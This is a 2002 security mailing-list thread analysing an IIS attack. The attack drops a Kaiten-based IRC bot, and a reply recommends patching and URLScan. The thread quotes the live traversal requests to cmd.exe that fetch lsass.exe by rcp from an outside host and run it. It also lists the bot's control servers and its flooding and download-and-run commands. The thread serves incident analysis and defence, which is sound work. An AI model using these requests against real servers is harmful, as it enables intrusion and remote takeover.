RE: new IIS worm? (rcp lsass.exe)

[Mark Challender <MarkC () mtbaker wednet edu>]

Hardening of IIS with the tools available at Microsoft and using URLSCAN
with the EXE blocking on will stop these attacks.

Patch, patch, patch, recheck the patches and use URLSCAN!

Mark Challender
Network Administrator

==================
Veni, Vidi, Geeki
==================


-----Original Message-----
From: pj () esec dk [mailto:pj () esec dk]
Sent: Monday, September 23, 2002 3:27 AM
To: incidents () securityfocus com
Subject: Re: new IIS worm? (rcp lsass.exe)



Christian Mock:

> Then it seems to go after the web servers, sending the following:

> GET
/scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:lsass.exe+
.
 HTTP/1.0..

> and

> GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0

> I've been able to get hold of that lsass.exe binary (9728 bytes), but
> I lack the skills to analyze it; I'll happily mail it to anybody who asks.


We have seen this attack from 4 different sources since Sept. 16, and have
informed the owner of 64.21.95.7 and downloaded the lsass.exe for
investigation.

Based on the attack rate this is most likely a scripted or manual attack,
not a worm.

Judging from  the embedded string in this compressed binary  it appears to
be an IRC bot  based on the kaiten.c code written by contem@efnet, the
author of the Slapper worm :

Kaiten Win32 API version 2002 by contem@efnet

The binary  contains these domainnames, most likeky IRC servers used for
controlling the bot:

telsa5.mine.nu (Korea)
irc.logicfive.net (Taiwan)
moncredo.shacknet.nu (USA)
telsacredo.shacknet.nu (USA)
lar.ath.cx (Taiwan)

The program accepts commands to make various DOS attacks or download new
version or executables with http:

NOTICE %s :PUSH <target> <port> <secs>   = A push flooder
NOTICE %s :TCP <target> <port> <secs>    = A syn flooder
NOTICE %s :UDP <target> <port> <secs>    = A udp flooder
NOTICE %s :MCON <target> <port> <times>  = A connectbomb flooder
NOTICE %s :NICK <nick>                   = Changes the nick of the client
NOTICE %s :DISABLE <pass>                = Disables all packeting from this
client
NOTICE %s :ENABLE <pass>                 = Enables all packeting from this
client
NOTICE %s :UPDATE <http address>         = Downloads a file off the web and
updates the client
NOTICE %s :RUN <http address>            = Downloads a file off the web and
runs it
NOTICE %s :GET <http address>            = Downloads a file off the web
NOTICE %s :ADDSERVER <server>            = Adds a server to the list
NOTICE %s :DELSERVER <server>            = Deletes a server from the list
NOTICE %s :LISTSERVERS                   = Lists server on the list
NOTICE %s :KILL                          = Kills the client
NOTICE %s :VERSION                       = Requests version of client
NOTICE %s :HELP                          = Displays this


There seems also to be a default account and password in the german
language included in this specific version of Kaiten.

The IIS attack that tries to inject this Trojan usually has another URL
with "CONNECT chat.vtm.be:6667".  This is an attempt to proxy an connection
to port 6667(IRC) on chat.vtm.be.



Peter Jelver
...

eSec A/S

http://www.esec.dk
............................................................................
.

PGP Fingerprint : 47AF FFEC D48F 9C13 0C4F  E687 BB8A 128F D85C A7D7





----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com